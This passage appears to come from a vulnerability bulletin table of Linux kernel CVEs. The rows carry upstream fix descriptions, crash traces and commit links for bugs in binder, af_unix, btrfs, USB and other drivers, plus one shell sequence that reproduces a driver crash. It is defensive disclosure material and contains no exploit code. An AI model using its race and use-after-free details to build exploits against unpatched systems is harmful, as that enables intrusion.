https://git.kernel.org/stable/c/f84639c5ac5f4f95b3992da1af4ff382ebf2e819 https://git.kernel.org/stable/c/d14e3e553e05cb763964c991fe6acb0a6a1c6f9c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: core: remove unnecessary frame_sz check in bpf_xdp_adjust_tail() Syzkaller reported the following issue: ======================================= Too BIG xdp->frame_sz = 131072 WARNING: CPU: 0 PID: 5020 at net/core/filter.c:4121 ____bpf_xdp_adjust_tail net/core/filter.c:4121 [inline] WARNING: CPU: 0 PID: 5020 at net/core/filter.c:4121 bpf_xdp_adjust_tail+0x466/0xa10 net/core/filter.c:4103 ... Call Trace: <TASK> bpf_prog_4add87e5301a4105+0x1a/0x1c __bpf_prog_run include/linux/filter.h:600 [inline] bpf_prog_run_xdp include/linux/filter.h:775 [inline] bpf_prog_run_generic_xdp+0x57e/0x11e0 net/core/dev.c:4721 netif_receive_generic_xdp net/core/dev.c:4807 [inline] do_xdp_generic+0x35c/0x770 net/core/dev.c:4866 tun_get_user+0x2340/0x3ca0 drivers/net/tun.c:1919 tun_chr_write_iter+0xe8/0x210 drivers/net/tun.c:2043 call_write_iter include/linux/fs.h:1871 [inline] new_sync_write fs/read_write.c:491 [inline] vfs_write+0x650/0xe40 fs/read_write.c:584 ksys_write+0x12f/0x250 fs/read_write.c:637 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd The xdp->frame_sz > PAGE_SIZE check was introduced in commit c8741e2bfe87 ("xdp: Allow bpf_xdp_adjust_tail() to grow packet size"). But Jesper Dangaard Brouer <jbrouer@redhat.com> noted that after introducing xdp_init_buff(), which all XDP drivers use, it's safe to remove this check. The original intent was to catch cases where XDP drivers have not been updated to use xdp.frame_sz, but that is no longer a concern (since xdp_init_buff). Running the initial syzkaller repro it was discovered that the contiguous physical memory allocation is used for both xdp paths in tun_get_user(), e.g. tun_build_skb() and tun_alloc_skb(). It was also stated by Jesper Dangaard Brouer <jbrouer@redhat.com> that XDP can work on higher order pages, as long as this is contiguous physical memory (e.g. a page). | 2025-12-24 | not yet calculated | CVE-2023-54155 | https://git.kernel.org/stable/c/a09c258cfa77d3ba0a7acc555c73eb6b005c4bd8 https://git.kernel.org/stable/c/20acffcdc2b74fb7dcc4e299f7aca173df89d911 https://git.kernel.org/stable/c/d9252d67ed2f921c230bba449ee051b5c32e4841 https://git.kernel.org/stable/c/d14eea09edf427fa36bd446f4a3271f99164202f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sfc: fix crash when reading stats while NIC is resetting efx_net_stats() (.ndo_get_stats64) can be called during an ethtool selftest, during which time nic_data->mc_stats is NULL as the NIC has been fini'd. In this case do not attempt to fetch the latest stats from the hardware, else we will crash on a NULL dereference: BUG: kernel NULL pointer dereference, address: 0000000000000038 RIP efx_nic_update_stats abridged calltrace: efx_ef10_update_stats_pf efx_net_stats dev_get_stats dev_seq_printf_stats Skipping the read is safe, we will simply give out stale stats. To ensure that the free in efx_ef10_fini_nic() does not race against efx_ef10_update_stats_pf(), which could cause a TOCTTOU bug, take the efx->stats_lock in fini_nic (it is already held across update_stats). | 2025-12-24 | not yet calculated | CVE-2023-54156 | https://git.kernel.org/stable/c/cb1aa7cc562cab6a87ea33574c8c65f2d2fd7aeb https://git.kernel.org/stable/c/91f4ef204e731565afdc6c2a7fcf509a3fd6fd67 https://git.kernel.org/stable/c/446f5567934331923d0aec4ce045e4ecb0174aae https://git.kernel.org/stable/c/470152d76b3ed107d172ea46acc4bfa941f20b4b https://git.kernel.org/stable/c/aba32b4c58112960c0c708703ca6b44dc8944082 https://git.kernel.org/stable/c/d1b355438b8325a486f087e506d412c4e852f37b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: binder: fix UAF of alloc->vma in race with munmap() [ cmllamas: clean forward port from commit 015ac18be7de ("binder: fix UAF of alloc->vma in race with munmap()") in 5.10 stable. It is needed in mainline after the revert of commit a43cfc87caaf ("android: binder: stop saving a pointer to the VMA") as pointed out by Liam. The commit log and tags have been tweaked to reflect this. ] In commit 720c24192404 ("ANDROID: binder: change down_write to down_read") binder assumed the mmap read lock is sufficient to protect alloc->vma inside binder_update_page_range(). This used to be accurate until commit dd2283f2605e ("mm: mmap: zap pages with read mmap_sem in munmap"), which now downgrades the mmap_lock after detaching the vma from the rbtree in munmap(). Then it proceeds to teardown and free the vma with only the read lock held. This means that accesses to alloc->vma in binder_update_page_range() now will race with vm_area_free() in munmap() and can cause a UAF as shown in the following KASAN trace: ================================================================== BUG: KASAN: use-after-free in vm_insert_page+0x7c/0x1f0 Read of size 8 at addr ffff16204ad00600 by task server/558 CPU: 3 PID: 558 Comm: server Not tainted 5.10.150-00001-gdc8dcf942daa #1 Hardware name: linux,dummy-virt (DT) Call trace: dump_backtrace+0x0/0x2a0 show_stack+0x18/0x2c dump_stack+0xf8/0x164 print_address_description.constprop.0+0x9c/0x538 kasan_report+0x120/0x200 __asan_load8+0xa0/0xc4 vm_insert_page+0x7c/0x1f0 binder_update_page_range+0x278/0x50c binder_alloc_new_buf+0x3f0/0xba0 binder_transaction+0x64c/0x3040 binder_thread_write+0x924/0x2020 binder_ioctl+0x1610/0x2e5c __arm64_sys_ioctl+0xd4/0x120 el0_svc_common.constprop.0+0xac/0x270 do_el0_svc+0x38/0xa0 el0_svc+0x1c/0x2c el0_sync_handler+0xe8/0x114 el0_sync+0x180/0x1c0 Allocated by task 559: kasan_save_stack+0x38/0x6c __kasan_kmalloc.constprop.0+0xe4/0xf0 kasan_slab_alloc+0x18/0x2c kmem_cache_alloc+0x1b0/0x2d0 vm_area_alloc+0x28/0x94 mmap_region+0x378/0x920 do_mmap+0x3f0/0x600 vm_mmap_pgoff+0x150/0x17c ksys_mmap_pgoff+0x284/0x2dc __arm64_sys_mmap+0x84/0xa4 el0_svc_common.constprop.0+0xac/0x270 do_el0_svc+0x38/0xa0 el0_svc+0x1c/0x2c el0_sync_handler+0xe8/0x114 el0_sync+0x180/0x1c0 Freed by task 560: kasan_save_stack+0x38/0x6c kasan_set_track+0x28/0x40 kasan_set_free_info+0x24/0x4c __kasan_slab_free+0x100/0x164 kasan_slab_free+0x14/0x20 kmem_cache_free+0xc4/0x34c vm_area_free+0x1c/0x2c remove_vma+0x7c/0x94 __do_munmap+0x358/0x710 __vm_munmap+0xbc/0x130 __arm64_sys_munmap+0x4c/0x64 el0_svc_common.constprop.0+0xac/0x270 do_el0_svc+0x38/0xa0 el0_svc+0x1c/0x2c el0_sync_handler+0xe8/0x114 el0_sync+0x180/0x1c0 [...] ================================================================== To prevent the race above, revert back to taking the mmap write lock inside binder_update_page_range(). One might expect an increase of mmap lock contention. However, binder already serializes these calls via top level alloc->mutex. Also, there was no performance impact shown when running the binder benchmark tests. | 2025-12-24 | not yet calculated | CVE-2023-54157 | https://git.kernel.org/stable/c/1bb8a65190d45cd5c7dbc85e29b9102110cd6be6 https://git.kernel.org/stable/c/931ea1ed31be939c1efdbc49bc66d2a45684f9b4 https://git.kernel.org/stable/c/ca0cc0a9c6e56c699e2acbb93d8024523021f3c3 https://git.kernel.org/stable/c/d1d8875c8c13517f6fd1ff8d4d3e1ac366a17e07 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: don't free qgroup space unless specified Boris noticed in his simple quotas testing that he was getting a leak with Sweet Tea's change to subvol create that stopped doing a transaction commit. This was just a side effect of that change. In the delayed inode code we have an optimization that will free extra reservations if we think we can pack a dir item into an already modified leaf. Previously this wouldn't be triggered in the subvolume create case because we'd commit the transaction, it was still possible but much harder to trigger. It could actually be triggered if we did a mkdir && subvol create with qgroups enabled. This occurs because in btrfs_insert_delayed_dir_index(), which gets called when we're adding the dir item, we do the following: btrfs_block_rsv_release(fs_info, trans->block_rsv, bytes, NULL); if we're able to skip reserving space. The problem here is that trans->block_rsv points at the temporary block rsv for the subvolume create, which has qgroup reservations in the block rsv. This is a problem because btrfs_block_rsv_release() will do the following: if (block_rsv->qgroup_rsv_reserved >= block_rsv->qgroup_rsv_size) { qgroup_to_release = block_rsv->qgroup_rsv_reserved - block_rsv->qgroup_rsv_size; block_rsv->qgroup_rsv_reserved = block_rsv->qgroup_rsv_size; } The temporary block rsv just has ->qgroup_rsv_reserved set, ->qgroup_rsv_size == 0. The optimization in btrfs_insert_delayed_dir_index() sets ->qgroup_rsv_reserved = 0. Then later on when we call btrfs_subvolume_release_metadata() which has btrfs_block_rsv_release(fs_info, rsv, (u64)-1, &qgroup_to_release); btrfs_qgroup_convert_reserved_meta(root, qgroup_to_release); qgroup_to_release is set to 0, and we do not convert the reserved metadata space. The problem here is that the block rsv code has been unconditionally messing with ->qgroup_rsv_reserved, because the main place this is used is delalloc, and any time we call btrfs_block_rsv_release() we do it with qgroup_to_release set, and thus do the proper accounting. The subvolume code is the only other code that uses the qgroup reservation stuff, but it's intermingled with the above optimization, and thus was getting its reservation freed out from underneath it and thus leaking the reserved space. The solution is to simply not mess with the qgroup reservations if we don't have qgroup_to_release set. This works with the existing code as anything that messes with the delalloc reservations always have qgroup_to_release set. This fixes the leak that Boris was observing. | 2025-12-24 | not yet calculated | CVE-2023-54158 | https://git.kernel.org/stable/c/1e05bf5e80bb1161b7294c9ce5292b26232ab853 https://git.kernel.org/stable/c/148b16cd30b202999ec5b534e3e5d8ab4b766f21 https://git.kernel.org/stable/c/f264be24146bee2d652010a18ae2517df5856261 https://git.kernel.org/stable/c/15e877e5923ec6d6caa5e447dcc4b79a8ff7cc53 https://git.kernel.org/stable/c/04ff6bd0317735791ef3e443c7c89f3c0dda548d https://git.kernel.org/stable/c/478bd15f46b6e3aae78aac4f3788697f1546eea6 https://git.kernel.org/stable/c/d246331b78cbef86237f9c22389205bc9b4e1cc1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: mtu3: fix kernel panic at qmu transfer done irq handler When handling the qmu transfer irq, it will unlock @mtu->lock before giving back the request; if another thread handles a disconnect event at the same time and tries to disable the ep, it may lock @mtu->lock and free the qmu ring, then the qmu irq handler may get a NULL gpd. Avoid the KE by checking the gpd's value before handling it. e.g. qmu done irq on cpu0 thread running on cpu1 qmu_done_tx() handle gpd [0] mtu3_requ_complete() mtu3_gadget_ep_disable() unlock @mtu->lock give back request lock @mtu->lock mtu3_ep_disable() mtu3_gpd_ring_free() unlock @mtu->lock lock @mtu->lock get next gpd [1] [1]: goto [0] to handle next gpd, and next gpd may be NULL. | 2025-12-24 | not yet calculated | CVE-2023-54159 | https://git.kernel.org/stable/c/26ca30516b2c49dd04c134cbdf122311c538df98 https://git.kernel.org/stable/c/012936502a9cb7b0604e85bb961eb15e2bb40dd9 https://git.kernel.org/stable/c/ee53a7a88027cea765c68f3b00a50b8f58d6f786 https://git.kernel.org/stable/c/f26273428657ef4ca74740e578ae45a3be492f6f https://git.kernel.org/stable/c/b636aff94a67be46582d4321d11743f1a10cc2c1 https://git.kernel.org/stable/c/3a7d4959560a2ee493ef222e3b63d359365f41ec https://git.kernel.org/stable/c/d28f4091ea7ec3510fd6a3c6d433234e7a2bef14 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: arm_sdei: Fix sleep from invalid context BUG Running a preempt-rt (v6.2-rc3-rt1) based kernel on an Ampere Altra triggers: BUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:46 in_atomic(): 0, irqs_disabled(): 128, non_block: 0, pid: 24, name: cpuhp/0 preempt_count: 0, expected: 0 RCU nest depth: 0, expected: 0 3 locks held by cpuhp/0/24: #0: ffffda30217c70d0 (cpu_hotplug_lock){++++}-{0:0}, at: cpuhp_thread_fun+0x5c/0x248 #1: ffffda30217c7120 (cpuhp_state-up){+.+.}-{0:0}, at: cpuhp_thread_fun+0x5c/0x248 #2: ffffda3021c711f0 (sdei_list_lock){....}-{3:3}, at: sdei_cpuhp_up+0x3c/0x130 irq event stamp: 36 hardirqs last enabled at (35): [<ffffda301e85b7bc>] finish_task_switch+0xb4/0x2b0 hardirqs last disabled at (36): [<ffffda301e812fec>] cpuhp_thread_fun+0x21c/0x248 softirqs last enabled at (0): [<ffffda301e80b184>] copy_process+0x63c/0x1ac0 softirqs last disabled at (0): [<0000000000000000>] 0x0 CPU: 0 PID: 24 Comm: cpuhp/0 Not tainted 5.19.0-rc3-rt5-[...] Hardware name: WIWYNN Mt.Jade Server [...] Call trace: dump_backtrace+0x114/0x120 show_stack+0x20/0x70 dump_stack_lvl+0x9c/0xd8 dump_stack+0x18/0x34 __might_resched+0x188/0x228 rt_spin_lock+0x70/0x120 sdei_cpuhp_up+0x3c/0x130 cpuhp_invoke_callback+0x250/0xf08 cpuhp_thread_fun+0x120/0x248 smpboot_thread_fn+0x280/0x320 kthread+0x130/0x140 ret_from_fork+0x10/0x20 sdei_cpuhp_up() is called in the STARTING hotplug section, which runs with interrupts disabled. Use a CPUHP_AP_ONLINE_DYN entry instead to execute the cpuhp cb later, with preemption enabled. SDEI originally got its own cpuhp slot to allow interacting with perf. It got superseded by pNMI and this early slot is not relevant anymore. [1] Some SDEI calls (e.g. SDEI_1_0_FN_SDEI_PE_MASK) take actions on the calling CPU. It is checked that preemption is disabled for them. _ONLINE cpuhp cb are executed in the 'per CPU hotplug thread'. Preemption is enabled in those threads, but their cpumask is limited to 1 CPU. Move 'WARN_ON_ONCE(preemptible())' statements so that SDEI cpuhp cb don't trigger them. Also add a check for the SDEI_1_0_FN_SDEI_PRIVATE_RESET SDEI call which acts on the calling CPU. [1]: https://lore.kernel.org/all/5813b8c5-ae3e-87fd-fccc-94c9cd08816d@arm.com/ | 2025-12-24 | not yet calculated | CVE-2023-54160 | https://git.kernel.org/stable/c/59842a9ba27d5390ae5bf3233a92cad3a26d495c https://git.kernel.org/stable/c/48ac727ea4a3577eb1b4e24f807ba532c47930f9 https://git.kernel.org/stable/c/7d8f5ccc826b39e05ff252b1fccd808c7a0725e0 https://git.kernel.org/stable/c/66caf22787714c925e755719c293aaf3cb0b873b https://git.kernel.org/stable/c/a8267bc8de736cae927165191b52fbc20d101dd1 https://git.kernel.org/stable/c/18d5ea5b746120a3972e6c347ad9428228445327 https://git.kernel.org/stable/c/d2c48b2387eb89e0bf2a2e06e30987cf410acad4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Fix null-ptr-deref in unix_stream_sendpage(). Bing-Jhong Billy Jheng reported null-ptr-deref in unix_stream_sendpage() with detailed analysis and a nice repro. unix_stream_sendpage() tries to add data to the last skb in the peer's recv queue without locking the queue. If the peer's FD is passed to another socket and the socket's FD is passed to the peer, there is a loop between them. If we close both sockets without receiving FD, the sockets will be cleaned up by garbage collection. The garbage collection iterates such sockets and unlinks skb with FD from the socket's receive queue under the queue's lock. So, there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free. To avoid the issue, unix_stream_sendpage() must lock the peer's recv queue. Note the issue does not exist in 6.5+ thanks to the recent sendpage() refactoring. This patch is originally written by Linus Torvalds. BUG: unable to handle page fault for address: ffff988004dd6870 PF: supervisor read access in kernel mode PF: error_code(0x0000) - not-present page PGD 0 P4D 0 PREEMPT SMP PTI CPU: 4 PID: 297 Comm: garbage_uaf Not tainted 6.1.46 #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:kmem_cache_alloc_node+0xa2/0x1e0 Code: c0 0f 84 32 01 00 00 41 83 fd ff 74 10 48 8b 00 48 c1 e8 3a 41 39 c5 0f 85 1c 01 00 00 41 8b 44 24 28 49 8b 3c 24 48 8d 4a 40 <49> 8b 1c 06 4c 89 f0 65 48 0f c7 0f 0f 94 c0 84 c0 74 a1 41 8b 44 RSP: 0018:ffffc9000079fac0 EFLAGS: 00000246 RAX: 0000000000000070 RBX: 0000000000000005 RCX: 000000000001a284 RDX: 000000000001a244 RSI: 0000000000400cc0 RDI: 000000000002eee0 RBP: 0000000000400cc0 R08: 0000000000400cc0 R09: 0000000000000003 R10: 0000000000000001 R11: 0000000000000000 R12: ffff888003970f00 R13: 00000000ffffffff R14: ffff988004dd6800 R15: 00000000000000e8 FS: 00007f174d6f3600(0000) GS:ffff88807db00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffff988004dd6870 CR3: 00000000092be000 CR4: 00000000007506e0 PKRU: 55555554 Call Trace: <TASK> ? __die_body.cold+0x1a/0x1f ? page_fault_oops+0xa9/0x1e0 ? fixup_exception+0x1d/0x310 ? exc_page_fault+0xa8/0x150 ? asm_exc_page_fault+0x22/0x30 ? kmem_cache_alloc_node+0xa2/0x1e0 ? __alloc_skb+0x16c/0x1e0 __alloc_skb+0x16c/0x1e0 alloc_skb_with_frags+0x48/0x1e0 sock_alloc_send_pskb+0x234/0x270 unix_stream_sendmsg+0x1f5/0x690 sock_sendmsg+0x5d/0x60 ____sys_sendmsg+0x210/0x260 ___sys_sendmsg+0x83/0xd0 ? kmem_cache_alloc+0xc6/0x1c0 ? avc_disable+0x20/0x20 ? percpu_counter_add_batch+0x53/0xc0 ? alloc_empty_file+0x5d/0xb0 ? alloc_file+0x91/0x170 ? alloc_file_pseudo+0x94/0x100 ? __fget_light+0x9f/0x120 __sys_sendmsg+0x54/0xa0 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x69/0xd3 RIP: 0033:0x7f174d639a7d Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 8a c1 f4 ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 de c1 f4 ff 48 RSP: 002b:00007ffcb563ea50 EFLAGS: 00000293 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f174d639a7d RDX: 0000000000000000 RSI: 00007ffcb563eab0 RDI: 0000000000000007 RBP: 00007ffcb563eb10 R08: 0000000000000000 R09: 00000000ffffffff R10: 00000000004040a0 R11: 0000000000000293 R12: 00007ffcb563ec28 R13: 0000000000401398 R14: 0000000000403e00 R15: 00007f174d72c000 </TASK> | 2025-12-24 | not yet calculated | CVE-2023-54161 | https://git.kernel.org/stable/c/d39fc9b94dc0719afa4bc8e58341a5eb41febef3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/guc: Fix stack_depot usage Add missing stack_depot_init() call when CONFIG_DRM_XE_DEBUG_GUC is enabled to fix the following call stack: [] BUG: kernel NULL pointer dereference, address: 0000000000000000 [] Workqueue: drm_sched_run_job_work [gpu_sched] [] RIP: 0010:stack_depot_save_flags+0x172/0x870 [] Call Trace: [] <TASK> [] fast_req_track+0x58/0xb0 [xe] (cherry picked from commit 64fdf496a6929a0a194387d2bb5efaf5da2b542f) | 2025-12-22 | not yet calculated | CVE-2025-68326 | https://git.kernel.org/stable/c/1966838d1c82149cbf4a652322d26a6e5aae9c4e https://git.kernel.org/stable/c/0e234632e39bd21dd28ffc9ba3ae8eec4deb949c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: renesas_usbhs: Fix synchronous external abort on unbind A synchronous external abort occurs on the Renesas RZ/G3S SoC if unbind is executed after the configuration sequence described above: modprobe usb_f_ecm modprobe libcomposite modprobe configfs cd /sys/kernel/config/usb_gadget mkdir -p g1 cd g1 echo "0x1d6b" > idVendor echo "0x0104" > idProduct mkdir -p strings/0x409 echo "0123456789" > strings/0x409/serialnumber echo "Renesas." > strings/0x409/manufacturer echo "Ethernet Gadget" > strings/0x409/product mkdir -p functions/ecm.usb0 mkdir -p configs/c.1 mkdir -p configs/c.1/strings/0x409 echo "ECM" > configs/c.1/strings/0x409/configuration if [ ! -L configs/c.1/ecm.usb0 ]; then ln -s functions/ecm.usb0 configs/c.1 fi echo 11e20000.usb > UDC echo 11e20000.usb > /sys/bus/platform/drivers/renesas_usbhs/unbind The displayed trace is as follows: Internal error: synchronous external abort: 0000000096000010 [#1] SMP CPU: 0 UID: 0 PID: 188 Comm: sh Tainted: G M 6.17.0-rc7-next-20250922-00010-g41050493b2bd #55 PREEMPT Tainted: [M]=MACHINE_CHECK Hardware name: Renesas SMARC EVK version 2 based on r9a08g045s33 (DT) pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs] lr : usbhsg_update_pullup+0x3c/0x68 [renesas_usbhs] sp : ffff8000838b3920 x29: ffff8000838b3920 x28: ffff00000d585780 x27: 0000000000000000 x26: 0000000000000000 x25: 0000000000000000 x24: ffff00000c3e3810 x23: ffff00000d5e5c80 x22: ffff00000d5e5d40 x21: 0000000000000000 x20: 0000000000000000 x19: ffff00000d5e5c80 x18: 0000000000000020 x17: 2e30303230316531 x16: 312d7968703a7968 x15: 3d454d414e5f4344 x14: 000000000000002c x13: 0000000000000000 x12: 0000000000000000 x11: ffff00000f358f38 x10: ffff00000f358db0 x9 : ffff00000b41f418 x8 : 0101010101010101 x7 : 7f7f7f7f7f7f7f7f x6 : fefefeff6364626d x5 : 8080808000000000 x4 : 000000004b5ccb9d x3 : 0000000000000000 x2 : 0000000000000000 x1 : ffff800083790000 x0 : ffff00000d5e5c80 Call trace: usbhs_sys_function_pullup+0x10/0x40 [renesas_usbhs] (P) usbhsg_pullup+0x4c/0x7c [renesas_usbhs] usb_gadget_disconnect_locked+0x48/0xd4 gadget_unbind_driver+0x44/0x114 device_remove+0x4c/0x80 device_release_driver_internal+0x1c8/0x224 device_release_driver+0x18/0x24 bus_remove_device+0xcc/0x10c device_del+0x14c/0x404 usb_del_gadget+0x88/0xc0 usb_del_gadget_udc+0x18/0x30 usbhs_mod_gadget_remove+0x24/0x44 [renesas_usbhs] usbhs_mod_remove+0x20/0x30 [renesas_usbhs] usbhs_remove+0x98/0xdc [renesas_usbhs] platform_remove+0x20/0x30 device_remove+0x4c/0x80 device_release_driver_internal+0x1c8/0x224 device_driver_detach+0x18/0x24 unbind_store+0xb4/0xb8 drv_attr_store+0x24/0x38 sysfs_kf_write+0x7c/0x94 kernfs_fop_write_iter+0x128/0x1b8 vfs_write+0x2ac/0x350 ksys_write+0x68/0xfc __arm64_sys_write+0x1c/0x28 invoke_syscall+0x48/0x110 el0_svc_common.constprop.0+0xc0/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x34/0xf0 el0t_64_sync_handler+0xa0/0xe4 el0t_64_sync+0x198/0x19c Code: 7100003f 1a9f07e1 531c6c22 f9400001 (79400021) ---[ end trace 0000000000000000 ]--- note: sh[188] exited with irqs disabled note: sh[188] exited with preempt_count 1 The issue occurs because usbhs_sys_function_pullup(), which accesses the IP registers, is executed after the USBHS clocks have been disabled. The problem is reproducible on the Renesas RZ/G3S SoC starting with the addition of module stop in the clock enable/disable APIs. With module stop functionality enabled, a bus error is expected if a master accesses a module whose clock has been stopped and module stop activated. Disable the IP clocks at the end of remove. | 2025-12-22 | not yet calculated | CVE-2025-68327 | https://git.kernel.org/stable/c/fd1a7bf3a8cac13f6d2d52d8c7570ba41621db9a https://git.kernel.org/stable/c/cd5e86e34c66a831b5cb9b720ad411a006962cc8 https://git.kernel.org/stable/c/230b1bc1310edcd5c1b71dcd6b77ccba43139cb5 https://git.kernel.org/stable/c/9d86bc8b188a77c8d6f7252280ec2bd24ad6fbc1 https://git.kernel.org/stable/c/26838f147aeaa8f820ff799d72815fba5e209bd9 https://git.kernel.org/stable/c/aa658a6d5ac21c7cde54c6d015f2d4daff32e02d https://git.kernel.org/stable/c/eb9ac779830b2235847b72cb15cf07c7e3333c5e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: stratix10-svc: fix bug in saving controller data Fix the incorrect usage of platform_set_drvdata and dev_set_drvdata. They both refer to the same data and override each other. This resulted in rmmod of the svc driver failing and throwing a kernel panic for kthread_stop and fifo free. | 2025-12-22 | not yet calculated | CVE-2025-68328 | https://git.kernel.org/stable/c/9d0a330abd9e49bcebf6307aac185081bde49a43 https://git.kernel.org/stable/c/354fb03002da0970d337f0d3edbeb46cc4fa6f41 https://git.kernel.org/stable/c/b359df793f609b1efce31dadfe6883ec73852619 https://git.kernel.org/stable/c/71796c91ee8e33faf4434a9e210b5063c28ea907 https://git.kernel.org/stable/c/60ab1851614e6007344042b66da6e31d1cc26cb3 https://git.kernel.org/stable/c/bd226fa02ed6db6fce0fae010802f0950fd14fb9 https://git.kernel.org/stable/c/d0fcf70c680e4d1669fcb3a8632f41400b9a73c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing: Fix WARN_ON in tracing_buffers_mmap_close for split VMAs When a VMA is split (e.g., by partial munmap or MAP_FIXED), the kernel calls vm_ops->close on each portion. For trace buffer mappings, this results in ring_buffer_unmap() being called multiple times while ring_buffer_map() was only called once. This causes ring_buffer_unmap() to return -ENODEV on subsequent calls because user_mapped is already 0, triggering a WARN_ON. Trace buffer mappings cannot support partial mappings because the ring buffer structure requires the complete buffer including the meta page. Fix this by adding a may_split callback that returns -EINVAL to prevent VMA splits entirely. | 2025-12-22 | not yet calculated | CVE-2025-68329 | https://git.kernel.org/stable/c/922fdd0b755a84f9933b3ca195f60092b6bb88ee https://git.kernel.org/stable/c/45053c12c45f0fb8ef6ab95118dd928d2fec0255 https://git.kernel.org/stable/c/b042fdf18e89a347177a49e795d8e5184778b5b6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: accel: bmc150: Fix irq assumption regression The code in bmc150-accel-core.c unconditionally calls bmc150_accel_set_interrupt() in the iio_buffer_setup_ops, such as on the runtime PM resume path giving a kernel splat like this if the device has no interrupts: Unable to handle kernel NULL pointer dereference at virtual address 00000001 when read PC is at bmc150_accel_set_interrupt+0x98/0x194 LR is at __pm_runtime_resume+0x5c/0x64 (...) Call trace: bmc150_accel_set_interrupt from bmc150_accel_buffer_postenable+0x40/0x108 bmc150_accel_buffer_postenable from __iio_update_buffers+0xbe0/0xcbc __iio_update_buffers from enable_store+0x84/0xc8 enable_store from kernfs_fop_write_iter+0x154/0x1b4 This bug seems to have been in the driver since the beginning, but it only manifests recently, I do not know why. Store the IRQ number in the state struct, as this is a common pattern in other drivers, then use this to determine if we have IRQ support or not. | 2025-12-22 | not yet calculated | CVE-2025-68330 | https://git.kernel.org/stable/c/aad9d048a3211c48ec02efa405bf462856feb862 https://git.kernel.org/stable/c/c891f504bb66604c822e7985e093cf39b97fdeb0 https://git.kernel.org/stable/c/cdd4a9e98004bd7c7488311951fa6dbae38b2b80 https://git.kernel.org/stable/c/65ad4ed983fd9ee0259d86391d6a53f78203918c https://git.kernel.org/stable/c/93eaa5ddc5fc4f50ac396afad8ce261102ebd4f3 https://git.kernel.org/stable/c/3aa385a9c75c09b59dcab2ff76423439d23673ab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: uas: fix urb unmapping issue when the uas device is removed during ongoing data transfer When a UAS device is unplugged during data transfer, there is a probability of a system panic occurring. The root cause is an access to an invalid memory address during URB callback handling. Specifically, this happens when the dma_direct_unmap_sg() function is called within the usb_hcd_unmap_urb_for_dma() interface, but the sg->dma_address field is 0 and the sg data structure has already been freed. The SCSI driver sends transfer commands by invoking uas_queuecommand_lck() in uas.c, using the uas_submit_urbs() function to submit requests to USB. Within the uas_submit_urbs() implementation, three URBs (sense_urb, data_urb, and cmd_urb) are sequentially submitted. Device removal may occur at any point during uas_submit_urbs execution, which may result in URB submission failure. However, some URBs might have been successfully submitted before the failure, and uas_submit_urbs will return the -ENODEV error code in this case. The current error handling directly calls scsi_done(). In the SCSI driver, this eventually triggers scsi_complete() to invoke scsi_end_request() for releasing the sgtable. The successfully submitted URBs, when being unlinked to giveback, call usb_hcd_unmap_urb_for_dma() in hcd.c, leading to exceptions during sg unmapping operations since the sg data structure has already been freed. This patch modifies the error condition check in the uas_submit_urbs() function. When a UAS device is removed but one or more URBs have already been successfully submitted to USB, it avoids immediately invoking scsi_done() and saves the cmnd to the devinfo->cmnd array. If the successfully submitted URBs are completed before devinfo->resetting is set, then the scsi_done() function will be called within uas_try_complete() after all pending URB operations are finalized. Otherwise, the scsi_done() function will be called within uas_zap_pending(), which is executed after usb_kill_anchored_urbs(). The error handling only takes effect when uas_queuecommand_lck() calls uas_submit_urbs() and returns the error value -ENODEV. In this case, the device is disconnected, and the flow proceeds to uas_disconnect(), where uas_zap_pending() is invoked to call uas_try_complete(). | 2025-12-22 | not yet calculated | CVE-2025-68331 | https://git.kernel.org/stable/c/6289fc489e94c9beb6be2b502ccc263663733d72 https://git.kernel.org/stable/c/66ac05e7b0d6bbd1bee9fcf729e20fd4cce86d17 https://git.kernel.org/stable/c/75f8e2643085db4f7e136fc6b368eb114dd80a64 https://git.kernel.org/stable/c/e3a55221f4de080cb7a91ba10f01c4f708603f8d https://git.kernel.org/stable/c/2b90a8131c83f6f2be69397d2b7d14d217d95d2f https://git.kernel.org/stable/c/426edbfc88b22601ea34a441a469092e7b301c52 https://git.kernel.org/stable/c/26d56a9fcb2014b99e654127960aa0a48a391e3c |
